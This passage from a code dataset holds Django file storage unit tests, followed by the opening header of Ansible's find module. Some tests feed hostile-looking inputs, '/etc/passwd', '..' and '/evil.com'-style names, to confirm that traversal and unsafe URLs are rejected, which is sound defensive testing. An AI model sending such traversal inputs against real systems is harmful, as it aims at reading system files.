        self.assertEqual(now.tzname(), dt.tzname())

        # The three timezones are indeed distinct.
        naive_now = datetime.now()
        algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
        django_offset = timezone.get_current_timezone().utcoffset(naive_now)
        utc_offset = timezone.utc.utcoffset(naive_now)
        self.assertGreater(algiers_offset, utc_offset)
        self.assertLess(django_offset, utc_offset)

        # dt and now should be the same effective time.
        self.assertLess(abs(dt - now), timedelta(seconds=2))
@override_settings(USE_TZ=False, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_off(self, getter):
    """With USE_TZ=False, `getter` must return a naive datetime in system time."""
    # Django's TZ (and hence the system TZ) is set to Africa/Algiers which
    # is UTC+1 and has no DST change. We can set the Django TZ to something
    # else so that UTC, Django's TIME_ZONE, and the system timezone are all
    # different.
    now_in_algiers = timezone.make_aware(datetime.now())

    with timezone.override(timezone.get_fixed_timezone(-300)):
        # At this point the system TZ is +1 and the Django TZ
        # is -5.
        self.assertFalse(self.storage.exists('test.file.tz.off'))

        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file.tz.off', f)
        self.addCleanup(self.storage.delete, f_name)
        dt = getter(f_name)
        # dt should be naive, in system (+1) TZ
        self.assertTrue(timezone.is_naive(dt))

        # The three timezones are indeed distinct.
        naive_now = datetime.now()
        algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
        django_offset = timezone.get_current_timezone().utcoffset(naive_now)
        utc_offset = timezone.utc.utcoffset(naive_now)
        self.assertGreater(algiers_offset, utc_offset)
        self.assertLess(django_offset, utc_offset)

        # dt and naive_now should be the same effective time.
        self.assertLess(abs(dt - naive_now), timedelta(seconds=2))
        # If we convert dt to an aware object using the Algiers
        # timezone then it should be the same effective time to
        # now_in_algiers.
        _dt = timezone.make_aware(dt, now_in_algiers.tzinfo)
        self.assertLess(abs(_dt - now_in_algiers), timedelta(seconds=2))
def test_file_get_accessed_time(self):
    """get_accessed_time() matches os.path.getatime and is recent."""
    self.assertFalse(self.storage.exists('test.file'))
    name = self.storage.save('test.file', ContentFile('custom contents'))
    self.addCleanup(self.storage.delete, name)
    atime = self.storage.get_accessed_time(name)

    self.assertEqual(atime, datetime.fromtimestamp(os.path.getatime(self.storage.path(name))))
    self.assertLess(timezone.now() - self.storage.get_accessed_time(name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_accessed_time_timezone(self):
    """Run the shared timezone checks against get_accessed_time()."""
    self._test_file_time_getter(self.storage.get_accessed_time)
@ignore_warnings(category=RemovedInDjango20Warning)
def test_file_accessed_time(self):
    """The deprecated accessed_time() still reports the file's atime."""
    self.assertFalse(self.storage.exists('test.file'))
    name = self.storage.save('test.file', ContentFile('custom contents'))
    self.addCleanup(self.storage.delete, name)
    atime = self.storage.accessed_time(name)

    self.assertEqual(atime, datetime.fromtimestamp(os.path.getatime(self.storage.path(name))))
    self.assertLess(datetime.now() - self.storage.accessed_time(name), timedelta(seconds=2))
def test_file_get_created_time(self):
    """get_created_time() matches os.path.getctime and is recent."""
    self.assertFalse(self.storage.exists('test.file'))
    name = self.storage.save('test.file', ContentFile('custom contents'))
    self.addCleanup(self.storage.delete, name)
    ctime = self.storage.get_created_time(name)

    self.assertEqual(ctime, datetime.fromtimestamp(os.path.getctime(self.storage.path(name))))
    self.assertLess(timezone.now() - self.storage.get_created_time(name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_created_time_timezone(self):
    """Run the shared timezone checks against get_created_time()."""
    self._test_file_time_getter(self.storage.get_created_time)
@ignore_warnings(category=RemovedInDjango20Warning)
def test_file_created_time(self):
    """The deprecated created_time() still reports the file's ctime."""
    self.assertFalse(self.storage.exists('test.file'))
    name = self.storage.save('test.file', ContentFile('custom contents'))
    ctime = self.storage.created_time(name)
    self.addCleanup(self.storage.delete, name)

    self.assertEqual(ctime, datetime.fromtimestamp(os.path.getctime(self.storage.path(name))))
    self.assertLess(datetime.now() - self.storage.created_time(name), timedelta(seconds=2))
def test_file_get_modified_time(self):
    """get_modified_time() matches os.path.getmtime and is recent."""
    self.assertFalse(self.storage.exists('test.file'))
    name = self.storage.save('test.file', ContentFile('custom contents'))
    self.addCleanup(self.storage.delete, name)
    mtime = self.storage.get_modified_time(name)

    self.assertEqual(mtime, datetime.fromtimestamp(os.path.getmtime(self.storage.path(name))))
    self.assertLess(timezone.now() - self.storage.get_modified_time(name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_modified_time_timezone(self):
    """Run the shared timezone checks against get_modified_time()."""
    self._test_file_time_getter(self.storage.get_modified_time)
@ignore_warnings(category=RemovedInDjango20Warning)
def test_file_modified_time(self):
    """The deprecated modified_time() still reports the file's mtime."""
    self.assertFalse(self.storage.exists('test.file'))
    name = self.storage.save('test.file', ContentFile('custom contents'))
    self.addCleanup(self.storage.delete, name)
    mtime = self.storage.modified_time(name)

    self.assertEqual(mtime, datetime.fromtimestamp(os.path.getmtime(self.storage.path(name))))
    self.assertLess(datetime.now() - self.storage.modified_time(name), timedelta(seconds=2))
def test_file_save_without_name(self):
    """save(None, f) falls back to the name attached to the content object."""
    self.assertFalse(self.storage.exists('test.file'))

    content = ContentFile('custom contents')
    content.name = 'test.file'

    stored_name = self.storage.save(None, content)
    self.assertEqual(stored_name, content.name)
    self.assertTrue(os.path.exists(os.path.join(self.temp_dir, content.name)))

    self.storage.delete(stored_name)
def test_file_save_with_path(self):
    """Saving to a nested path creates the intermediate directories."""
    self.assertFalse(self.storage.exists('path/to'))
    self.storage.save('path/to/test.file', ContentFile('file saved with path'))

    self.assertTrue(self.storage.exists('path/to'))
    with self.storage.open('path/to/test.file') as handle:
        self.assertEqual(handle.read(), b'file saved with path')

    self.assertTrue(os.path.exists(
        os.path.join(self.temp_dir, 'path', 'to', 'test.file')))

    self.storage.delete('path/to/test.file')
def test_save_doesnt_close(self):
    """storage.save() must leave the caller's file object (and its
    underlying file) open, for both temporary and in-memory uploads."""
    with TemporaryUploadedFile('test', 'text/plain', 1, 'utf8') as file:
        file.write(b'1')
        file.seek(0)
        self.assertFalse(file.closed)
        self.storage.save('path/to/test.file', file)
        self.assertFalse(file.closed)
        self.assertFalse(file.file.closed)

    file = InMemoryUploadedFile(six.StringIO('1'), '', 'test', 'text/plain', 1, 'utf8')
    with file:
        self.assertFalse(file.closed)
        self.storage.save('path/to/test.file', file)
        self.assertFalse(file.closed)
        self.assertFalse(file.file.closed)
def test_file_path(self):
    """path() returns the absolute filesystem location of a stored file."""
    self.assertFalse(self.storage.exists('test.file'))
    name = self.storage.save('test.file', ContentFile('custom contents'))
    self.assertEqual(self.storage.path(name), os.path.join(self.temp_dir, name))
    self.storage.delete(name)
def test_file_url(self):
    """
    File storage returns a url to access a given file from the Web.
    Exact escaping expectations mirror JavaScript's encodeURIComponent().
    """
    self.assertEqual(self.storage.url('test.file'), self.storage.base_url + 'test.file')

    # should encode special chars except ~!*()'
    # like encodeURIComponent() JavaScript function do
    self.assertEqual(
        self.storage.url(r"~!*()'@#$%^&*abc`+ =.file"),
        "/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file"
    )
    self.assertEqual(self.storage.url("ab\0c"), "/test_media_url/ab%00c")

    # should translate os path separator(s) to the url path separator
    self.assertEqual(self.storage.url("""a/b\\c.file"""), "/test_media_url/a/b/c.file")

    # #25905: remove leading slashes from file names to prevent unsafe url output
    self.assertEqual(self.storage.url("/evil.com"), "/test_media_url/evil.com")
    self.assertEqual(self.storage.url(r"\evil.com"), "/test_media_url/evil.com")
    self.assertEqual(self.storage.url("///evil.com"), "/test_media_url/evil.com")
    self.assertEqual(self.storage.url(r"\\\evil.com"), "/test_media_url/evil.com")

    self.assertEqual(self.storage.url(None), "/test_media_url/")
def test_base_url(self):
    """url() fails without a base_url and auto-appends a missing trailing slash."""
    self.storage.base_url = None
    with self.assertRaises(ValueError):
        self.storage.url('test.file')

    # #22717: missing ending slash in base_url should be auto-corrected
    storage = self.storage_class(location=self.temp_dir, base_url='/no_ending_slash')
    self.assertEqual(storage.url('test.file'), '%s%s' % (storage.base_url, 'test.file'))
def test_listdir(self):
    """
    File storage returns a tuple containing directories and files.
    """
    self.assertFalse(self.storage.exists('storage_test_1'))
    self.assertFalse(self.storage.exists('storage_test_2'))
    self.assertFalse(self.storage.exists('storage_dir_1'))

    self.storage.save('storage_test_1', ContentFile('custom content'))
    self.storage.save('storage_test_2', ContentFile('custom content'))
    os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))

    # listdir('') lists the storage root: one subdirectory, two files.
    dirs, files = self.storage.listdir('')
    self.assertEqual(set(dirs), {'storage_dir_1'})
    self.assertEqual(set(files), {'storage_test_1', 'storage_test_2'})

    self.storage.delete('storage_test_1')
    self.storage.delete('storage_test_2')
    os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))
def test_file_storage_prevents_directory_traversal(self):
    """
    File storage prevents directory traversal (files can only be accessed if
    they're below the storage location).
    """
    for traversal_name in ('..', '/etc/passwd'):
        with self.assertRaises(SuspiciousOperation):
            self.storage.exists(traversal_name)
def test_file_storage_preserves_filename_case(self):
    """The storage backend should preserve case of filenames."""
    # A storage backend rooted at the second (mixed case) temp directory.
    case_storage = self.storage_class(location=self.temp_dir2)
    mixed_case_name = 'CaSe_SeNsItIvE'
    handle = case_storage.open(mixed_case_name, 'w')
    handle.write('storage contents')
    handle.close()
    self.assertEqual(
        os.path.join(self.temp_dir2, mixed_case_name),
        case_storage.path(mixed_case_name),
    )
    case_storage.delete(mixed_case_name)
def test_makedirs_race_handling(self):
    """
    File storage should be robust against directory creation race conditions.
    """
    real_makedirs = os.makedirs

    # Monkey-patch os.makedirs, to simulate a normal call, a raced call,
    # and an error.
    def fake_makedirs(path):
        if path == os.path.join(self.temp_dir, 'normal'):
            real_makedirs(path)
        elif path == os.path.join(self.temp_dir, 'raced'):
            # Create the directory, then raise as if another process had
            # just created it: EEXIST must be tolerated by the storage.
            real_makedirs(path)
            raise OSError(errno.EEXIST, 'simulated EEXIST')
        elif path == os.path.join(self.temp_dir, 'error'):
            raise OSError(errno.EACCES, 'simulated EACCES')
        else:
            self.fail('unexpected argument %r' % path)

    try:
        os.makedirs = fake_makedirs

        self.storage.save('normal/test.file', ContentFile('saved normally'))
        with self.storage.open('normal/test.file') as f:
            self.assertEqual(f.read(), b'saved normally')

        self.storage.save('raced/test.file', ContentFile('saved with race'))
        with self.storage.open('raced/test.file') as f:
            self.assertEqual(f.read(), b'saved with race')

        # OSErrors aside from EEXIST are still raised.
        with self.assertRaises(OSError):
            self.storage.save('error/test.file', ContentFile('not saved'))
    finally:
        os.makedirs = real_makedirs
def test_remove_race_handling(self):
    """
    File storage should be robust against file removal race conditions.
    """
    real_remove = os.remove

    # Monkey-patch os.remove, to simulate a normal call, a raced call
    # (the file disappears between the existence check and the unlink),
    # and an error.
    def fake_remove(path):
        if path == os.path.join(self.temp_dir, 'normal.file'):
            real_remove(path)
        elif path == os.path.join(self.temp_dir, 'raced.file'):
            real_remove(path)
            raise OSError(errno.ENOENT, 'simulated ENOENT')
        elif path == os.path.join(self.temp_dir, 'error.file'):
            raise OSError(errno.EACCES, 'simulated EACCES')
        else:
            self.fail('unexpected argument %r' % path)

    try:
        os.remove = fake_remove

        self.storage.save('normal.file', ContentFile('delete normally'))
        self.storage.delete('normal.file')
        self.assertFalse(self.storage.exists('normal.file'))

        self.storage.save('raced.file', ContentFile('delete with race'))
        self.storage.delete('raced.file')
        # BUG FIX: the original asserted 'normal.file' again here (copy-paste
        # error), so the raced-deletion branch was never actually verified.
        self.assertFalse(self.storage.exists('raced.file'))

        # OSErrors aside from ENOENT are still raised.
        self.storage.save('error.file', ContentFile('delete with error'))
        with self.assertRaises(OSError):
            self.storage.delete('error.file')
    finally:
        os.remove = real_remove
def test_file_chunks_error(self):
    """
    Test behavior when file.chunks() is raising an error
    """
    broken_file = ContentFile('chunks fails')

    def failing_chunks():
        raise IOError

    broken_file.chunks = failing_chunks
    # The IOError from chunks() must propagate out of save().
    with self.assertRaises(IOError):
        self.storage.save('error.file', broken_file)
def test_delete_no_name(self):
    """
    Calling delete with an empty name should not try to remove the base
    storage directory, but fail loudly (#20660).
    """
    with self.assertRaises(AssertionError):
        self.storage.delete('')
@override_settings(
    MEDIA_ROOT='media_root',
    MEDIA_URL='media_url/',
    FILE_UPLOAD_PERMISSIONS=0o777,
    FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o777,
)
def test_setting_changed(self):
    """
    Properties using settings values as defaults should be updated on
    referenced settings change while specified values should be unchanged.
    """
    # One storage pins every option explicitly; the other relies entirely on
    # the settings-derived defaults.
    storage = self.storage_class(
        location='explicit_location',
        base_url='explicit_base_url/',
        file_permissions_mode=0o666,
        directory_permissions_mode=0o666,
    )
    defaults_storage = self.storage_class()
    settings = {
        'MEDIA_ROOT': 'overriden_media_root',
        'MEDIA_URL': 'overriden_media_url/',
        'FILE_UPLOAD_PERMISSIONS': 0o333,
        'FILE_UPLOAD_DIRECTORY_PERMISSIONS': 0o333,
    }
    with self.settings(**settings):
        # Explicitly-configured storage is unaffected by the override...
        self.assertEqual(storage.base_location, 'explicit_location')
        self.assertIn('explicit_location', storage.location)
        self.assertEqual(storage.base_url, 'explicit_base_url/')
        self.assertEqual(storage.file_permissions_mode, 0o666)
        self.assertEqual(storage.directory_permissions_mode, 0o666)

        # ...while the defaults-based storage tracks the new settings.
        self.assertEqual(defaults_storage.base_location, settings['MEDIA_ROOT'])
        self.assertIn(settings['MEDIA_ROOT'], defaults_storage.location)
        self.assertEqual(defaults_storage.base_url, settings['MEDIA_URL'])
        self.assertEqual(defaults_storage.file_permissions_mode, settings['FILE_UPLOAD_PERMISSIONS'])
        self.assertEqual(
            defaults_storage.directory_permissions_mode, settings['FILE_UPLOAD_DIRECTORY_PERMISSIONS']
        )
class CustomStorage(FileSystemStorage):
    """Storage that numbers duplicates Trac-style: file.txt, file.2.txt, ..."""

    def get_available_name(self, name, max_length=None):
        """
        Append numbers to duplicate files rather than underscores, like Trac.
        """
        # Everything before the first dot is the stem; the remainder of the
        # name (split on dots) is re-appended after the counter.
        stem, dot, remainder = name.partition('.')
        suffix = remainder.split('.') if dot else []
        counter = 2
        while self.exists(name):
            name = '.'.join([stem, str(counter)] + suffix)
            counter += 1
        return name
class CustomStorageTests(FileStorageTests):
    # Re-run the full FileStorageTests suite against CustomStorage, plus a
    # check of its Trac-style duplicate naming.
    storage_class = CustomStorage

    def test_custom_get_available_name(self):
        # The first save keeps the requested name; a duplicate gets ".2".
        first = self.storage.save('custom_storage', ContentFile('custom contents'))
        self.assertEqual(first, 'custom_storage')
        second = self.storage.save('custom_storage', ContentFile('more contents'))
        self.assertEqual(second, 'custom_storage.2')
        self.storage.delete(first)
        self.storage.delete(second)
class CustomStorageLegacyDatetimeHandling(FileSystemStorage):
    # Use the legacy accessed_time() et al from FileSystemStorage and the
    # shim get_accessed_time() et al from the Storage baseclass. Both of those
    # raise warnings, so the testcase class ignores them all.
    def get_accessed_time(self, name):
        # super(FileSystemStorage, self) deliberately skips FileSystemStorage
        # in the MRO so the deprecated Storage shim is the one exercised.
        return super(FileSystemStorage, self).get_accessed_time(name)

    def get_created_time(self, name):
        return super(FileSystemStorage, self).get_created_time(name)

    def get_modified_time(self, name):
        return super(FileSystemStorage, self).get_modified_time(name)
@ignore_warnings(category=RemovedInDjango20Warning)
class CustomStorageLegacyDatetimeHandlingTests(FileStorageTests):
    # Re-run the whole FileStorageTests suite through the legacy datetime
    # code paths; deprecation warnings are expected and suppressed.
    storage_class = CustomStorageLegacyDatetimeHandling
class DiscardingFalseContentStorage(FileSystemStorage):
    """Storage that silently discards any content evaluating as falsy."""

    def _save(self, name, content):
        # Falsy content is dropped and an empty name returned; everything
        # else is stored normally by the parent implementation.
        if not content:
            return ''
        return super(DiscardingFalseContentStorage, self)._save(name, content)
class DiscardingFalseContentStorageTests(FileStorageTests):
    storage_class = DiscardingFalseContentStorage

    def test_custom_storage_discarding_empty_content(self):
        """
        When Storage.save() wraps a file-like object in File, it should include
        the name argument so that bool(file) evaluates to True (#26495).
        """
        output = six.StringIO('content')
        self.storage.save('tests/stringio', output)
        self.assertTrue(self.storage.exists('tests/stringio'))

        with self.storage.open('tests/stringio') as f:
            self.assertEqual(f.read(), b'content')
class FileFieldStorageTests(TestCase):
    """FileField behavior against the module-level temp_storage backend."""

    def tearDown(self):
        shutil.rmtree(temp_storage_location)

    def _storage_max_filename_length(self, storage):
        """
        Query filesystem for maximum filename length (e.g. AUFS has 242).
        """
        # Walk up until we hit an existing directory we can query.
        dir_to_test = storage.location
        while not os.path.exists(dir_to_test):
            dir_to_test = os.path.dirname(dir_to_test)
        try:
            return os.pathconf(dir_to_test, 'PC_NAME_MAX')
        except Exception:
            return 255  # Should be safe on most backends

    def test_files(self):
        self.assertIsInstance(Storage.normal, FileDescriptor)

        # An object without a file has limited functionality.
        obj1 = Storage()
        self.assertEqual(obj1.normal.name, "")
        with self.assertRaises(ValueError):
            obj1.normal.size

        # Saving a file enables full functionality.
        obj1.normal.save("django_test.txt", ContentFile("content"))
        self.assertEqual(obj1.normal.name, "tests/django_test.txt")
        self.assertEqual(obj1.normal.size, 7)
        self.assertEqual(obj1.normal.read(), b"content")
        obj1.normal.close()

        # File objects can be assigned to FileField attributes, but shouldn't
        # get committed until the model it's attached to is saved.
        obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
        dirs, files = temp_storage.listdir("tests")
        self.assertEqual(dirs, [])
        self.assertNotIn("assignment.txt", files)

        obj1.save()
        dirs, files = temp_storage.listdir("tests")
        self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])

        # Save another file with the same name.
        obj2 = Storage()
        obj2.normal.save("django_test.txt", ContentFile("more content"))
        obj2_name = obj2.normal.name
        six.assertRegex(self, obj2_name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
        self.assertEqual(obj2.normal.size, 12)
        obj2.normal.close()

        # Deleting an object does not delete the file it uses.
        obj2.delete()
        obj2.normal.save("django_test.txt", ContentFile("more content"))
        self.assertNotEqual(obj2_name, obj2.normal.name)
        six.assertRegex(self, obj2.normal.name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
        obj2.normal.close()

    def test_filefield_read(self):
        # Files can be read in a little at a time, if necessary.
        obj = Storage.objects.create(
            normal=SimpleUploadedFile("assignment.txt", b"content"))
        obj.normal.open()
        self.assertEqual(obj.normal.read(3), b"con")
        self.assertEqual(obj.normal.read(), b"tent")
        self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
        obj.normal.close()

    def test_filefield_write(self):
        # Files can be written to.
        obj = Storage.objects.create(normal=SimpleUploadedFile('rewritten.txt', b'content'))
        with obj.normal as normal:
            normal.open('wb')
            normal.write(b'updated')
        obj.refresh_from_db()
        self.assertEqual(obj.normal.read(), b'updated')
        obj.normal.close()

    def test_filefield_reopen(self):
        obj = Storage.objects.create(normal=SimpleUploadedFile('reopen.txt', b'content'))
        with obj.normal as normal:
            normal.open()
        # Reopening after the context manager exited must still work.
        obj.normal.open()
        obj.normal.file.seek(0)
        obj.normal.close()

    def test_duplicate_filename(self):
        # Multiple files with the same name get _(7 random chars) appended to them.
        objs = [Storage() for i in range(2)]
        for o in objs:
            o.normal.save("multiple_files.txt", ContentFile("Same Content"))
        try:
            names = [o.normal.name for o in objs]
            self.assertEqual(names[0], "tests/multiple_files.txt")
            six.assertRegex(self, names[1], "tests/multiple_files_%s.txt" % FILE_SUFFIX_REGEX)
        finally:
            for o in objs:
                o.delete()

    def test_file_truncation(self):
        # Given the max_length is limited, when multiple files get uploaded
        # under the same name, then the filename get truncated in order to fit
        # in _(7 random chars). When most of the max_length is taken by
        # dirname + extension and there are not enough characters in the
        # filename to truncate, an exception should be raised.
        objs = [Storage() for i in range(2)]
        filename = 'filename.ext'

        for o in objs:
            o.limited_length.save(filename, ContentFile('Same Content'))
        try:
            # Testing truncation.
            names = [o.limited_length.name for o in objs]
            self.assertEqual(names[0], 'tests/%s' % filename)
            six.assertRegex(self, names[1], 'tests/fi_%s.ext' % FILE_SUFFIX_REGEX)

            # Testing exception is raised when filename is too short to truncate.
            filename = 'short.longext'
            objs[0].limited_length.save(filename, ContentFile('Same Content'))
            with self.assertRaisesMessage(SuspiciousFileOperation, 'Storage can not find an available filename'):
                objs[1].limited_length.save(*(filename, ContentFile('Same Content')))
        finally:
            for o in objs:
                o.delete()

    @unittest.skipIf(
        sys.platform.startswith('win'),
        "Windows supports at most 260 characters in a path.",
    )
    def test_extended_length_storage(self):
        # Testing FileField with max_length > 255. Most systems have filename
        # length limitation of 255. Path takes extra chars.
        filename = (self._storage_max_filename_length(temp_storage) - 4) * 'a'  # 4 chars for extension.
        obj = Storage()
        obj.extended_length.save('%s.txt' % filename, ContentFile('Same Content'))
        self.assertEqual(obj.extended_length.name, 'tests/%s.txt' % filename)
        self.assertEqual(obj.extended_length.read(), b'Same Content')
        obj.extended_length.close()

    def test_filefield_default(self):
        # Default values allow an object to access a single file.
        temp_storage.save('tests/default.txt', ContentFile('default content'))
        obj = Storage.objects.create()
        self.assertEqual(obj.default.name, "tests/default.txt")
        self.assertEqual(obj.default.read(), b"default content")
        obj.default.close()

        # But it shouldn't be deleted, even if there are no more objects using
        # it.
        obj.delete()
        obj = Storage()
        self.assertEqual(obj.default.read(), b"default content")
        obj.default.close()

    def test_empty_upload_to(self):
        # upload_to can be empty, meaning it does not use subdirectory.
        obj = Storage()
        obj.empty.save('django_test.txt', ContentFile('more content'))
        self.assertEqual(obj.empty.name, "django_test.txt")
        self.assertEqual(obj.empty.read(), b"more content")
        obj.empty.close()

    def test_random_upload_to(self):
        # Verify the fix for #5655, making sure the directory is only
        # determined once.
        obj = Storage()
        obj.random.save("random_file", ContentFile("random content"))
        self.assertTrue(obj.random.name.endswith("/random_file"))
        obj.random.close()

    def test_custom_valid_name_callable_upload_to(self):
        """
        Storage.get_valid_name() should be called when upload_to is a callable.
        """
        obj = Storage()
        obj.custom_valid_name.save("random_file", ContentFile("random content"))
        # CustomValidNameStorage.get_valid_name() appends '_valid' to the name
        self.assertTrue(obj.custom_valid_name.name.endswith("/random_file_valid"))
        obj.custom_valid_name.close()

    def test_filefield_pickling(self):
        # Push an object into the cache to make sure it pickles properly
        obj = Storage()
        obj.normal.save("django_test.txt", ContentFile("more content"))
        obj.normal.close()
        cache.set("obj", obj)
        self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")

    def test_file_object(self):
        # Create sample file
        temp_storage.save('tests/example.txt', ContentFile('some content'))

        # Load it as python file object
        with open(temp_storage.path('tests/example.txt')) as file_obj:
            # Save it using storage and read its content
            temp_storage.save('tests/file_obj', file_obj)
        self.assertTrue(temp_storage.exists('tests/file_obj'))
        with temp_storage.open('tests/file_obj') as f:
            self.assertEqual(f.read(), b'some content')

    def test_stringio(self):
        # Test passing StringIO instance as content argument to save
        output = six.StringIO()
        output.write('content')
        output.seek(0)

        # Save it and read written file
        temp_storage.save('tests/stringio', output)
        self.assertTrue(temp_storage.exists('tests/stringio'))
        with temp_storage.open('tests/stringio') as f:
            self.assertEqual(f.read(), b'content')
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
    """ContentFile whose chunks() sleeps, widening the save race window."""

    def chunks(self):
        time.sleep(1)
        # BUG FIX: the original called super(ContentFile, self), which skips
        # ContentFile itself in the MRO; super(SlowFile, self) is the correct
        # cooperative call and still defers to the parent implementation.
        return super(SlowFile, self).chunks()
class FileSaveRaceConditionTest(unittest.TestCase):
    # Race condition on file saving (#4948): two concurrent save() calls for
    # the same name must produce two distinct files.
    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)
        # The second writer runs in a thread so both saves overlap (SlowFile
        # sleeps inside chunks()).
        self.thread = threading.Thread(target=self.save_file, args=['conflict'])

    def tearDown(self):
        shutil.rmtree(self.storage_dir)

    def save_file(self, name):
        name = self.storage.save(name, SlowFile(b"Data"))

    def test_race_condition(self):
        self.thread.start()
        self.save_file('conflict')
        self.thread.join()
        files = sorted(os.listdir(self.storage_dir))
        # One writer keeps the requested name; the loser gets a random suffix.
        self.assertEqual(files[0], 'conflict')
        six.assertRegex(self, files[1], 'conflict_%s' % FILE_SUFFIX_REGEX)
@unittest.skipIf(sys.platform.startswith('win'), "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
    """File and directory modes applied to uploads, with and without explicit
    FILE_UPLOAD_* permission settings."""

    def setUp(self):
        # Pin the process umask so the default-permission expectations below
        # are deterministic regardless of the environment.
        self.umask = 0o027
        self.old_umask = os.umask(self.umask)
        self.storage_dir = tempfile.mkdtemp()

    def tearDown(self):
        shutil.rmtree(self.storage_dir)
        os.umask(self.old_umask)

    @override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
    def test_file_upload_permissions(self):
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save("the_file", ContentFile("data"))
        actual_mode = os.stat(self.storage.path(name))[0] & 0o777
        self.assertEqual(actual_mode, 0o654)

    @override_settings(FILE_UPLOAD_PERMISSIONS=None)
    def test_file_upload_default_permissions(self):
        self.storage = FileSystemStorage(self.storage_dir)
        fname = self.storage.save("some_file", ContentFile("data"))
        mode = os.stat(self.storage.path(fname))[0] & 0o777
        # Without an explicit setting, modes follow 0o666 masked by the umask.
        self.assertEqual(mode, 0o666 & ~self.umask)

    @override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
    def test_file_upload_directory_permissions(self):
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save("the_directory/the_file", ContentFile("data"))
        dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
        self.assertEqual(dir_mode, 0o765)

    @override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
    def test_file_upload_directory_default_permissions(self):
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save("the_directory/the_file", ContentFile("data"))
        dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
        self.assertEqual(dir_mode, 0o777 & ~self.umask)
class FileStoragePathParsing(unittest.TestCase):
    """Filename mangling when directory names contain dots."""

    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)

    def tearDown(self):
        shutil.rmtree(self.storage_dir)

    def test_directory_with_dot(self):
        """Regression test for #9610.

        If the directory name contains a dot and the file name doesn't, make
        sure we still mangle the file name instead of the directory name.
        """
        self.storage.save('dotted.path/test', ContentFile("1"))
        self.storage.save('dotted.path/test', ContentFile("2"))

        files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
        # The directory itself must not have been renamed.
        self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
        self.assertEqual(files[0], 'test')
        six.assertRegex(self, files[1], 'test_%s' % FILE_SUFFIX_REGEX)

    def test_first_character_dot(self):
        """
        File names with a dot as their first character don't have an extension,
        and the underscore should get added to the end.
        """
        self.storage.save('dotted.path/.test', ContentFile("1"))
        self.storage.save('dotted.path/.test', ContentFile("2"))

        files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
        self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
        self.assertEqual(files[0], '.test')
        six.assertRegex(self, files[1], '.test_%s' % FILE_SUFFIX_REGEX)
class ContentFileStorageTestCase(unittest.TestCase):
    """Saving ContentFile instances built from either bytes or text."""

    def setUp(self):
        self.tmp_root = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.tmp_root)

    def tearDown(self):
        shutil.rmtree(self.tmp_root)

    def test_content_saving(self):
        """
        ContentFile can be saved correctly with the filesystem storage,
        if it was initialized with either bytes or unicode content.
        """
        self.storage.save('bytes.txt', ContentFile(b"content"))
        self.storage.save('unicode.txt', ContentFile("español"))
@override_settings(ROOT_URLCONF='file_storage.urls')
class FileLikeObjectTestCase(LiveServerTestCase):
    """
    Test file-like objects (#15644).
    """

    available_apps = []

    def setUp(self):
        self.temp_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(location=self.temp_dir)

    def tearDown(self):
        shutil.rmtree(self.temp_dir)

    def test_urllib2_urlopen(self):
        """
        Test the File storage API with a file like object coming from urllib2.urlopen()
        """
        # Wrap the live-server HTTP response in File and store it, then fetch
        # the same URL again to compare against what was written to disk.
        file_like_object = urlopen(self.live_server_url + '/')
        f = File(file_like_object)
        stored_filename = self.storage.save("remote_file.html", f)

        remote_file = urlopen(self.live_server_url + '/')
        with self.storage.open(stored_filename) as stored_file:
            self.assertEqual(stored_file.read(), remote_file.read())
| bsd-3-clause |
halberom/ansible | lib/ansible/modules/files/find.py | 19 | 13484 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2014, Ruggero Marchei <ruggero.marchei@daemonzone.net>
# (c) 2015, Brian Coca <bcoca@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>
ANSIBLE_METADATA = {'status': ['stableinterface'],
'supported_by': 'core',
'version': '1.0'}
DOCUMENTATION = '''
---
module: find
author: Brian Coca (based on Ruggero Marchei's Tidy)
version_added: "2.0"
short_description: return a list of files based on specific criteria
